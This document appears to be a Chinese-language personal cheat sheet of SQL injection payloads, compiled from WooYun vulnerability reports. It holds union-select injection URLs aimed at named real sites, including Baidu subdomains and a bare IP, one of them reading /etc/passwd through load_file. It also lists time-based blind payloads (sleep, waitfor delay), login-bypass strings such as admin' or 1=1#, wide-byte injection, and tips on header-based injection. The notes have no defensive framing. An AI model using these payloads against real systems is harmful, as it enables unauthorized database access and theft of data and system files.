SQL:注入篇:
http://www.wooyun.org/bugs/wooyun-2010-0114928
http://weixin.family.baidu.com/index.php/site/user_t?id=1%27%20union%20select%201,2,version%28%29,4%20--%20;
http://www.wooyun.org/bugs/wooyun-2010-0105423
"https://jpaas-edu.baidu.com/xplatfe/invite/api_use_invite_code?invite_code=123' or 1=(1=".$_GET['sql'].") limit 1--+&verify=7kpc"
http://180.149.139.84/api/api.php?action=info&virtualserver=fe-dpool_wb_head_pic%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file%28%27/etc/passwd%27%29,13%20--%20;
lijiejie的stirng型注入语句:
id=17' and sleep(5)#;//有时注意and的短路原则,似乎用or更好
id=(sleep(length(user())=18)),id=1235-1(12345-length(user()))
abc' and/or (select * from (select(sleep(10)))b) and '1'='1 //sqlmap经典延时语句了的
http://kact.kingdee.com/world/createArticle?corp_id=aaa'XOR(if(length(user())=20,sleep(3),0))OR'bbb(无空格吊炸天语句)
登陆框注入的密码:
admin' or 1=1# 密码随意
admin' or '1'='1' -- ;
伪静态相关:(一般延时注入比较多见奏效)
http://www.wooyun.org/bugs/wooyun-2010-0119845 or if(length(database(),1,1)<5,sleep(1),1)
http://www.wooyun.org/bugs/wooyun-2010-0119490 延时注入:waitfor delay '0:0:5'-- 相关语句 xnjodhe'; waitfor delay '0:0:5' --
常见于搜索型的注入
http://www.wooyun.org/bugs/wooyun-2010-0118356 abc' or "=' ; %' and 1=1 and '%‘=’%
还有http头部注射类型:clenmt-ip,user-agent之类的
一般post,ajax,api处隐藏的问题比较多吧
字符型测试案例:
1' and 1=1-- http://t2.easou.com/zone/mobile/mobilekey/key/0/breed_id/1' and 1=1-- /mid/1100/ou/rurl http://www.wooyun.org/bugs/wooyun-2010-092366(伪静态案例)
1' and '1'='1,1 and '1'='2
http://ldj.db.17173.com/showInfo.php?a=1&id=(sleep(length(user())=18))
宽字节注入案例:
http://www.wooyun.org/bugs/wooyun-2010-0134651 %df'
http://www.wooyun.org/bugs/wooyun-2010-0133613 (聪明的小伙子)運
数字型测试案例:
1 and sleep(5)
0 0
